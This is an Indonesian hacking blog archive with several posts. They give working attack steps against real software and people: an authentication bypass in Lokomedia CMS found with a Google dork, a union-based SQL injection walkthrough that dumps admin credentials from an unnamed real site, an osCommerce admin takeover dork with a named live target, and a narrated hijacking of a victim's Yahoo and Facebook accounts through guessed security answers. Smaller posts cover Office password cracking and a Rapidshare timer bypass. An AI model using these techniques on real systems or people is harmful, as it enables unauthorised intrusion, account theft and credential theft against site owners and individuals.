Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Bugs pada cms lokomedia versi 1

07 September 2010

CMS Lokomedia merupakan CMS (Content Management System) yang dibuat oleh Lukmanul Hakim dimana CMS ini bersifat opensource yang source codenya diberikan dalam bundling buku yang ditulis oleh Lukmanul Hakim dengan judul "Membongkar Trik Rahasia Para Master PHP". Dalam buku itu sendiri kita diajarkan untuk membuat sebuah website lebih khususnya kepada project untuk membuat sebuah CMS.

CMS Lokomedia Versi 1 merupakan CMS versi pertama yang diluncurkan karena setelahnya memang dikeluarkan lagi versi terbarunya pada buku yang berikutnya bahkan pada bukunya yang terakhir CMS ini sudah diupdate sedemikian rupa bahkan sudah menggunakan framework jquery didalamnya.

Berdasarkan penglihatan saya melalui mesin pencari google dengan menggunakan keyword inurl:media.php
saya menemukan cukup banyak situs yang menggunakan CMS ini. Keyword ini saya pergunakan dikarenakan setiap web yang menggunakan CMS ini urlnya pasti berbentuk seperti ini :

http://www.apaajadeh.com/media.php?module=home

Lalu ada apa gerangan dengan CMS ini?
Ada satu hal yang hendak saya bahas disini terutama mengenai bugs yang ada pada CMS Lokomedia. sebenarnya bugs pada cms lokomedia sudah lama ditemukan dan sang pembuat CMS pun sudah memberikan update pada buku berikutnya yaitu pada buku "Trik Rahasia Master PHP Terbongkar Lagi". Namun entah kenapa masih saja ada beberapa situs yang belum melakukan update sehingga hal ini sangat riskan untuk website tersebut.
Ini telah saya buktikan sendiri pada beberapa situs yang saya dapati melalui google.
Bugs yang paling utamanya adalah memungkinkan user yang tidak login dan tanpa level admin dapat merubah / mengutak-atik isi website dengan sesuka hatinya hal ini dikarenakan adanya suatu bugs pada file content.php

Bagaimana itu bisa terjadi langkah dibawah ini menjelaskan bagaimana seorang yang tidak login dapat melakukan perubahan terhadap isi/konten dari website yang menggunakan CMS ini.
Sebelum lebih jauh membahasnya berikut gambar tampilan CMS Lokomedia Versi 1.


Dari struktur file yang ada pada CMS ini untuk dapat mengakses halaman admin kita dapat menambahkan kata admin setelah domain web.
Contoh :

http://www.apaajadeh.com/admin

Lalu akan tampil halaman untuk melakukan login seperti gambar dibawah ini :


Lalu bagaimanakah seseorang yang tanpa login dapat mengakses halaman admin?
Apakah dengan menggunakan teknik SQL Injection atau sejenisnya?
Jawabannya adalah tidak perlu menggunakan teknik SQL Injection bagi seseorang yang tidak login untuk dapat masuk kehalaman admin.
Lalu bagaimana caranya?
Pada url ubahlah menjadi :

http://www.apaajadeh.com/admin/content.php?module=home

apa yang terjadi?? Baaamm... website menunjukan bahwa ada sedang dalam keadaan login sebagai seorang admin/user


Begitu mudahnya seorang yang tanpa login untuk bisa mengakses halaman admin.
Lalu apakah hanya sampai disini?
Tentu tidak.. dengan memanfaatkan bugs ini kita bisa merubah isi/konten website bahkan bisa juga untuk menambahkan user. hmm.. kalau sudah begini website kita sudah sangat tidak aman.
Berikut contoh pemanfaatan bugs ini untuk menambahkan sebuah user baru..
pada URL ubah menjadi seperti berikut ini :

http://www.apaajadeh.com/admin/content.php?module=user

maka akan tampil halaman untuk melakukan manajemen user. dari situ kita bisa menambah, mengedit, bahkan menghapus user yang ada.


Jadi jika anda ingin merubah suatu modul cukup dengan menyertakan nama modulnya setelah content.php?module=

Dalam kondisi standardnya (yang diberikan pada bukunya) terdapat 8 buah modul yang digunakan untuk memanage isi/konten web yaitu :
- Manajemen User
- Manajemen Modul
- Profil
- Berita
- Agenda
- Pengumuman
- Banner
- Hubungi Kami

Untuk dapat melihat modul apa saja yang ada pada CMS tersebut ubahlah URL menjadi seperti berikut ini :

http://www.apaajadeh.com/admin/content.php?module=modul

Kalau sudah begini sisanya tinggal terserah anda mau melakukan apa :)
Nah contoh berikut ini adalah yang bisa terjadi pada website apabila belum dilakukan patch (saya melakukan perubahan pada profil) :


Ok.. semoga informasi  ini berguna khususnya bagi yang webnya menggunakan CMS ini tetapi belum melakukan patch..
Next time saya akan memposting trick untuk mengatasi bugs ini.
READ MORE - Bugs pada cms lokomedia versi 1

Social Enginering on Facebook (Hack Facebook Account)

10 April 2010

Social Enginering on Facebook merupakan sebuah teknik yang bisa digunakan untuk melakukan hacking terhadap account facebook seseorang.
Adapun dalam teknik social enginering ini kita terlebih dahulu mencari informasi-informasi penting dari si korban sebanyak mungkin untuk bisa menaklukan account facebook korban.
Perlu digaris bawahi disini bahwa saya menulis artikel ini bukan bersifat untuk mengajari bagaimana kita dapat menguasai account facebook seseorang namun lebih kepada pemberian informasi semata.
Gunakan informasi ini secara bijak dan use it at your own risk.

Ok sebut saja saya mempunyai seorang victim dengan inisial YK. Saya add account korban dengan tujuan untuk mencari informasi mengenai korban.
Ternyata langsung di approve oleh korban pada esok harinya.. hmm.. ini berarti korban sangat mudah untuk menerima friend request dari orang lain dan ini merupakan sebuah kesalahan awal. ingat jangan pernah percaya pada siapapun di dunia cyber. jangan mudah mengconfirm orang yang tidak kita kenal atau tidak ada sama sekali mutual friendnya.

Saya amati selama 2hari facebook korban mulai dari wall sampai dengan info sehingga saya mendapatkan beberapa informasi penting tentang korban.
Setelah saya mendapatkan informasi penting mengenai korban saat-nyalah untuk memulai aksi

pertama saya buka email provider korban :



apa yang saya lakukan setelahnya..??
saya memiliki informasi-informasi penting mengenai korban dan juga emailnya tapi saya tidak mengetahui passwordnya. yang saya lakukan setelah itu adalah mengklik menu "Saya tidak dapat mengakses akun saya".
Akan tampil halaman seperti dibawah ini :



Yahoo menanyakan kita mengenai apa yang terjadi terhadap akun yahoo korban. disini saya menjawab dengan pilihan "Tampaknya akun saya digunakan orang yang tidak berwenang" yang mana tujuannya adalah agar saya dapat menguasai penuh email korban.
Berikutnya adalah muncul wizard untuk mulai mereset akun email korban. Pertama-tama kita akan diminta untuk menginputkan email dan juga kode captcha yang diberikan oleh yahoo.



Tahap berikutnya adalah verifikasi identitas. Dimana yahoo menanyakan apakah korban mempunyai akun email alternatif atau korban tidak bisa mengakses satupun dari emailnya. pada step ini saya memilih "Saya tidak dapat mengakses satupun dari yang disebut diatas"



Tahap berikutnya yahoo menanyakan pertanyaan rahasia korban. wow.. the second fault of him is creating his girlfriend name as a security question. ingat jangan pernah sekalipun menjadikan nama pacar, istri, suami, atau tunangan anda sebagai security question email..!!
karena saya telah mengetahui informasi korban secara lengkap sehingga sudah pasti saya mengetahui nama pacar korban.. saya input nama pacar korban pada kolom jawaban security question email korban.



Ternyata muncul lagi security question yang kedua.. and again.. the third fault of him is creating his motorcycle brandname as a security question.. awalnya saya tidak mengetahui apa merek motor korban.. namun setelah saya lihat-lihat lagi account Facebook korban, saya liat fotonya terdapat foto dimana dia sedang berada diatas sebuah motor j*****r.. hmm.. apakah mungkin itu motor korban? so lets try..



woohoooo... ternyata benar motor dengan merek j*****r yang ada pada foto korban merupakan motor korban. Yahoo pun membawa saya ke tahap berikutnya untuk mulai mengganti password yang lama dengan password baru yang tentunya saya sekarang yang memegang kendali..



Ok.. email korban sudah ditangan kita..




Dengan berbekal email korban sudah ditangan kita sangatlah mudah untuk membajak akun Facebook korban.
Langkah selanjutnya adalah saya membuka Facebook kemudian mengklik menu "Lupa kata sandi Anda?".



Facebook meminta kita untuk memasukan captcha yang diberikan olehnya kemudian kita juga diminta untuk memasukan alamat email korban seperti pada gambar diatas.
Selanjutnya Facebook akan meminta kita untuk melakukan konfirmasi untuk mengatur ulang sandi.
Klik tombol "Atur ulang kata sandi saya".



Facebook selanjutnya akan mengirimkan email ke email korban yang isinya merupakan kode konfirmasi untuk mereset akun facebook..
cek email yang telah berasil kita kuasai sebelumnya..




Kembali ke Facebook dan masukan kode konfirmasi untuk mereset password Facebook korban.



Setelah itu Facebook akan meminta kita untuk memasukan password baru..



Facebook korban sudah ditangan anda (^^,)



Untuk menghindari hal seperti tersebut diatas maka :
- jangan sekali-kali anda menyimpan informasi-informasi penting pada facebook anda semisal email, nomor hp, dll.
- jangan mengikuti group-group seperti "CARA MENGETAHUI SIAPA YANG MELIHAT PROFIL FACEBOOK KITA" karena group semacam itu kebanyakan digunakan untuk phising. jika sudah terlanjur ikut.. leave group tersebut.
- selalu pastikan pada saat anda membuka facebook alamat pada addressbar browser menunjukan http://www.facebook.com/ jangan hanya melihat tampilan pada webbrowser anda.. hati-hati terhadap phising
- jangan terpedaya oleh omongan teman anda terutama pada saat chating yang memberikan iming-iming untuk melindungi akun facebook dengan memasukan sejumlah baris kode pada saat chat untuk melindungi akun facebook anda seperti #0910FB#email#password.
- jangan sembarang mengklik direct link yang diberikan oleh teman anda di facebook
- gunakan password dengan panjang karakter 15 karakter yang digabung dengan angka semisal : 1mn0tstup1db0y5
- jangan gunakan pertanyaan yang bersifat pribadi pada security question email anda seperti nama pacar, nomor telphone, dll
- tambahkan alternatif mail pada email supaya mempermudah anda dalam proses recovery apabila email anda telah berhasil dibajak seseorang..

semoga informasi pada artikel ini bermanfaat..
use it at your own risk...

nb : account korban sudah saya kembalikan seperti semula
READ MORE - Social Enginering on Facebook (Hack Facebook Account)

Step by Step Sql Injection

14 September 2009

Sql Injection merupakan salah satu tehnik hacking yang cukup banyak digunakan dimana tehnik ini memanfaatkan kesalahan pada penulisan bahasa program sehingga seorang hacker bisa mendapatkan sebuah user name dan juga password untuk bisa masuk ke dalam sistem.

Disini saya akan gambarkan dalam sebuah kisah nyata :-)
Saya mencoba googling (istilah untuk melakukan pencarian di google) dan mencari-cari webuah situs..
Akhirnya saya menemukan sebuah website outsourcing milik malaysia yang cukup menarik perhatian saya...

Domainnya sengaja tidak akan saya sebutkan :-)
Ok iseng membuka-buka halaman yang ada dan saya buka halaman news rilis disana terdapat beberapa berita dan saya coba lihat beritanya..
Dasar otak lagi iseng akhirnya saya iseng melakukan pencarian kutu...

Awalnya pada addressbar mozilla saya menunjukan alamat seperti berikut ini :

http://xxxx.com.my/readmore.php?ID=2

dan semuanya masih normal seperti tampil pada gambar dibawah ini :


Apa yang harus saya lakukan dengan alamat tersebut..??
Berdasarkan apa yang telah saya dapat dan saya baca dari berbagai sumber untuk mencari "kutunya" bisa menggunakan karakter khusus seperti ' dan -

Ok kita coba masukan karakter tersebut pada addressbar browser contohnya seperti berikut ini :

http://xxxx.com.my/readmore.php?ID=2'

aw..aw..aw.. (kenapa mas...?? sakit..??)
heheh gag kok.. ternyata apa yang saya dapat dengan menambahkan tanda ' pada alamat tersebut?
ditemukan sebuah eror seperti gambar dibawah ini :


lalu bagaimana jika saya menggunakan yang berikutnya yaitu tanda - seperti dibawah ini :

http://xxxx.com.my/readmore.php?ID=-2

erornya ilang tapi kok isi beritanya gag muncul yach...?? contohnya seperti digambar dibawah ini :


nah itu berarti situs tersebut terdapat vulnerable yang memungkinkan kita melakukan serangan Sql Injection..

Kalo udah tau ada kutunya terus apa yang harus kita lakukan..??
Ok langkah berikutnya adalah mencari dan menghitung jumlah table yang ada didalam databasenya dengan menggunakan perintah "+order+by+" tanpa tanda kutip..
jadi nanti yang harus diketikan diaddress barnya adalah seperti berikut ini :

http://xxxx.com.my/readmore.php?ID=-2+order+by+1--

hmmm ternyata masih kosong dan tidak tampil apa-apa...
lalu saya harus bagaimana..??
dalam sebuah website tidak mungkin hanya terdapat 1buah table dan kolom bukan..??
Ok kalo gitu kita rubah angka 1 menjadi 2.. seperti dibawah ini :

http://xxxx.com.my/readmore.php?ID=-2+order+by+2--

apa yang terjadi..??
masih juga kosong...
coba sekarang ganti jadi 3 jadi nantinya menjadi :

http://xxxx.com.my/readmore.php?ID=-2+order+by+3--

kosong lagi... ganti deh jadi 4 :

http://xxxx.com.my/readmore.php?ID=-2+order+by+4--

haduh kosong juga... ganti lagi jadi 5 :

http://xxxx.com.my/readmore.php?ID=-2+order+by+5--

lagi-lagi kosong... mas sebenernya bisa ga siy..?? kok dari tadi kosong terus ga ada apa-apanya..??!!!
Sabar ya.. hacking itu butuh kesabaran dan ketelatenan.. tidak semudah membalikan telapak tangan..
Jadi kalo anda memang tidak bisa sabar saya anjurkan ga usah belajar.. hehehe
Terus saya harus gimana..?? ya coba lagi atuh tadi kan baru 5.. jadi..?? jadi ya coba ganti jadi 6 :

http://xxxx.com.my/readmore.php?ID=-2+order+by+6--

aha.... ternyata muncul sebuah eror lagi seperti gambar dibawah ini :


nah kesabaran pasti berbuah sesuatu yang baik bukan.. akhirnya ketemu juga bahwa terdapat 5 kolom diwebsite tersebut..
Kalo udah ketemu gimana selanjutnya..?? gunakan perintah "+union+select+" tanpa tanda kutip...
fungsinya adalah untuk menampilan informasi..
Karena tadi eror pada saat angka ke 6 jadi nanti urlnya seperti berikut ini :

http://xxxx.com.my/readmore.php?ID=-2+union+select+1,2,3,4,5--

nah nanti akan muncul seperti gambar berikut :


pada gambar tersebut muncul angka 5 seperti yang dilingkari dengan warna merah..
ok selanjutnya adalah mencari versi sql yang digunakan..
kalo pake versi 4 kelaut ajah.. hehehe maksudnya sudahi sajah mending cari target lain..
Lho kenapa emangnya mas..??
Karena di versi4 kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema jadi lebih susah kan.. :-)

Perintah yang dipergunakan adalah : version() atau @@version
jadi nantinya urlnya akan seperti berikut ini :

http://xxxx.com.my/readmore.php?ID=-2+union+select+1,2,3,4,version()--

syukurlah ternyata saya mendapatkan website yang menggunakan Sql versi 5 seperti terlihat pada gambar dibawah ini :


Ok selanjutnya kita lihat semua isi dari tablenya..
Untuk melihatnya gunakan perintah "group_concat(table_name)" tanpa kutip.. nah ini dimasukan pada angka yang sebelumnya keluar tadi yaitu angka 5. dan juga perintah "+from+information_schema.tables+where+table_schema=database()--" tanpa kutip.. nah yang ini dimasukan di angka paling terakhir.. karena angka 5 merupakan angka terakhir jadi nanti urlnya seperti berikut ini :

http://xxxx.com.my/readmore.php?ID=-2+union+select+1,2,3,4,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--

wew dapat juga isi tablenya..


Ok sekarang langkah selanjutnya adalah mencari table/kolom yang memiliki informasi admin/user yang didalamnya tentunya terdapat username dan password..
dari gambar diatas tadi saya liat terdapat table dengan nama 'admin' ok kita bongkar isinya..
Kita gunakan perintah "group_concat(column_name)" tanpa tanda kutip yang nantinya dimasukan pada angka yang keluar tadi yaitu angka 5... dan juga perintah "+from+information_schema.columns+where+table_name=0xhexa--" tanpa kutip.. dimasukan setelah angka paling terakhir.. nah disini kita harus mengconvert kata pada isi table menjadi hexdecimal.

Nyarinya dimana om..?? ya pake google lah.. :-)
atau anda bisa mengunjungi website ini http://tools.vyc0d.com/converter/ atau di http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
yang kita ingin gunakan tadi adalah admin maka akan menjadi 61646d696e setelah diconvert..
Jadi nanti di urlnya berntuknya seperti ini:

http://xxxx.com.my/readmore.php?ID=-2+union+select+1,2,3,4,group_concat(column_name)+from+information_schema.columns+where+table_name=0x61646d696e--

lalu akan tampil seperti pada gambar dibawah ini :


wew.. banyak sekali yang kita dapat bukan..
huaaahhmmm... ngantuk juga euy.. minum kopi dulu ah...

.....
..............
.........................

Ok lanjut.. langkah selanjutnya adalah memunculkan apa yang telah dikeluarkan dari table yang kita dapat barusan...
gunakan perintah "group_concat(0x3a,isi column yg mau dikeluarin)" tanpa kutip.. yang dimasukin di angka yang keluar tadi yaitu angka 5.. (wah kayanya angka 5 jadi angka keramat ^_^ )
dan juga perintah +from+(nama table berasal) yang dimasukan setelah angka terakhir..
0x3a itu sama saja dengan tanda ":"

dari gambar diatas terdapat beberapa info dari table admin.. nah yang saya gunakan hanya 3 saja yaitu username,password, dan juga Name karena saya yakin inilah yang nantinya bakal digunakan untuk login..
ok jadi nanti bentuk di urlnya adalah sepeti berikut ini :

http://xxxx.com.my/readmore.php?ID=-2+union+select+1,2,3,4,group_concat(username,0x3a,password,0x3a,Name)+from+admin--

dan taraa........ hasilnya seperti muncul pada gambar dibawah ini :


olala... user dan password adminnya berhasil kita dapatkan...

terakhir and tinggal mencari halaman login Adminnya.. Login sebagai Admin kemudian selanjutnya terserah anda :-)
Ok semoga berguna untuk anda.. selamat belajar... sorry kalo artikelnya cupu.. saya juga masih belajar... :-)
READ MORE - Step by Step Sql Injection

Mudah Menjebol Password Office

15 August 2009

Pernah memiliki sebuah dokumen office yang terpassword??
Namun pastinya akan sangat menjengkelkan bila anda lupa passwordnya..
Hal ini sendiri pernah dialami oleh saya sendiri..

Mungkin di luar sana sudah banyak artikel yang memberikan informasi bagaimana agar kita bisa mendapatkan kembali password yang kita lupa tersebut..
Disini saya mungkin akan sedikit menjelaskan bagaimana caranya menjebol password file office tersebut menggunakan Passware Password Recovery Kit Enterprise..

Kenapa saya lebih menyukai menggunakan software ini..? tentunya karena tools ini memiliki fasilitas lain yang cukup berguna bagi kita yang sering kali lupa password.. jadi bukan hanya untuk menjebol password office saja..

OK.. berikut kronologinya bila kita akan menjebol sebuah file office yang terpassword..
Kronologi pertama tentunya yaitu pada saat dijalankan file office tersebut meminta kita untuk menginput password seperti gambar dibawah ini :


Hehehe maaf ada bagian gambar yang saya buramkan demi kebaikan karena itu file milik orang :-)

Ok langkah berikutnya kita akan langsung menjebol passwordnya..
Jalankanlah program Passware Password Recovery Kit Enterprise dalam hal ini versi yang saya pakai adalah versi 9.0.


Setelah anda jalankan programnya kemudian pilihlah menu Recover File Password untuk memulai menjebol password office.
Anda nanti akan diminta untuk mencari file yang akan anda jebol passwordnya misalkan file tersebut letaknya ada di C:\Foldersaya\Filesaya.doc.

Programpun akan langsung beraksi untuk menemukan password dari dokumen tersebut dan hasilnya akan tampil seperti gambar berikut :


File open password dan File modify passwordnyapun sudah dapat anda ketahui.. mudah bukan??
OK selamat mencoba..
READ MORE - Mudah Menjebol Password Office

Trik Mengatasi Limit dan Timer Rapidshare

28 June 2009

Rapidshit (baca rapidshare) merupakan sebuah website yang menyediakan jasa filehosting yang cukup banyak digunakan.
Banyak orang yang menggunakan fasilitas filehosting yang disediakan oleh rapidshare untuk mengupload file miliknya semisal file MP3 agar nantinya bisa di download oleh orang lain..
Namun bagi orang yang tidak memiliki akun premium di rapidshare pasti akan sangat menyebalkan dikarenakan jika kita tidak menggunakan akun premium maka kita tidak dapat mendownload beberapa file secara sekaligus dan jika kita tidak menggunakan akun premium maka akan ada timer waktu agar kita menunggu hingga file tersebut dapat didownload.

Tentunya hal seperti itu akan sangat menjengkelkan bila anda adalah salah satu orang yang tidak memiliki akun premium di rapidshare sama halnya dengan saya :-)
Namun tidak usah khawatir.. Pepatah mengatakan ada banyak jalan menuju roma.. (Jiiaaahhh sok filosofis gitu gw ^_^ ).

OK... kita mulai terlebih dahulu dari bagaimana kita dapat mendownload banyak file sekaligus...
caranya cukup mudah.. cukup tambahkan http://anonymz.com/? didepan nama file yang akan kita download..
Contoh jika anda ingin mendownload file dengan link rapidshare seperti berikut ini http://rapidshare.com/files/1234567/abcdefg.mp3
maka anda cukup mengetik http://anonymz.com/?http://rapidshare.com/files/1234567/abcdefg.mp3 di kolom URL browser anda...
nah untuk mendownload file yang kedua cukup menggunakan cara yang sama jadi anda sekarang sudah bisa mendownload beberapa file secara bersamaan.. mudah bukan..??

Lalu bagaimana mengatasi timer downloadnya..??
nah begini caranya..
1. Download file seperti biasa di Rapidshare dengan memilih Free User.
2. Ketika kita memilih Free User biasanya timer akan berjalan, Nah pada saat timer berjalan masukan perintah javascript di url browser, berikut scriptnya :
javascript:alert(c=0)
3. Nah nantinya akan muncul sebuah popup (messagebox), Klik tombol OK pada popup tersebut...
selamat mencoba...

http://gnoubdils.blogspot.com/
READ MORE - Trik Mengatasi Limit dan Timer Rapidshare

Vulnerable on OS Commerce

26 June 2009

OS Commerce merupakan sebuah Content Management System (CMS) gratis yang memberikan fasilitas kepada kita untuk membuat sebuah situs Online Shoping sehingga kita tidak perlu mengeluarkan biaya yang cukup besar dalam membuat website Online Shoping tersebut.

OS Commerce sendiri sebagai sebuah CMS saya rasa sudah cukup baik.. namun masih terdapat beberapa vulnerable pada CMS tersebut.. salah satunya yaitu dengan memungkinkannya seseorang menjadi Admin disitus tersebut.. kalau sudah begitu kejadiannya kita sebagai pemilik Online Shoping tentunya akan dirugikan..

Disini akan sedikit saya terangkan bagaimana kita bisa menguasai situs Online Shoping tersebut hanya dengan bantuan Google…
Vulnerable pada OS Commerce ini sebenarnya sudah cukup lama ditemukan jadi pastinya sang pembuat OS Commerce sudah membuat patchnya namun terkadang masih terdapat banyak admin web yang malas untuk melakukan update sehingga masih dapat kita jumpai situs-situs yang menggunakan CMS ini yang dapat ditembus.

Pertama-2 kita buka browser, anda boleh menggunakan IE, Firefox, Opera bahkan Chrome sekalipun sesuai dengan keinginan anda..
Kemudian bukalah situs pencarian terbesar Google.. nah pada kolom pencarian ketikan seperti berikut ini :

allinurl: admin/file_manager.php

nah nantinya akan muncul sejumlah situs.. perintah tersebut bisa dikombinasikan dengan perintah pencarian Google yang lain seperti “site:” (tanpa kutip) sekreatif andalah dalam pencariannya..

jika anda beruntung anda akan mendapatkan sebuah situs yang belum di patch sehingga tanpa perlu melakukan proses Sql Injection pun anda dapat menjadi seorang admin pada situs tersebut.. ingat semua itu butuh kesabaran.. karena dalam proses hacking anda dituntut untuk bersabar.. semua tidak bisa dilakukan dengan instant..!!

salah satu situs yang berhasil saya temui adalah :

http://svaneshoppen.dk/

tapi saya tidak tahu lagi apakah situs tersebut sekarang sudah dipatch atau belum.. saya tidak melakukan pengecekan lagi…
OK jadi silahkan berburu…. ingat kesabaran adalah kunci kesuksesan :-) jadi bersabarlah dalam melakukan pencarian karena setahu saya sudah banyak situs yang menggunakan OS Commerce yang sudah di patch..
READ MORE - Vulnerable on OS Commerce

Artikel Lain

 
 
 

Go To Link

  »  A1VBCode
  »  Bina Sarana Informatika
  »  Blogger
  »  Deconstruction Code
  »  Diskusiweb
  »  dremi.info
  »  Echo
  »  Facebook
  »  Gary Abraham
  »  Ilmu Website
  »  JQuery
  »  Mahesajenar Widget
  »  STMIK Nusa Mandiri
  »  OOM Blog
  »  Planet Source Code
  »  Rahma Blog
  »  Terren Jr
  »  VB-Bego
  »  Herry Blog

Advertisement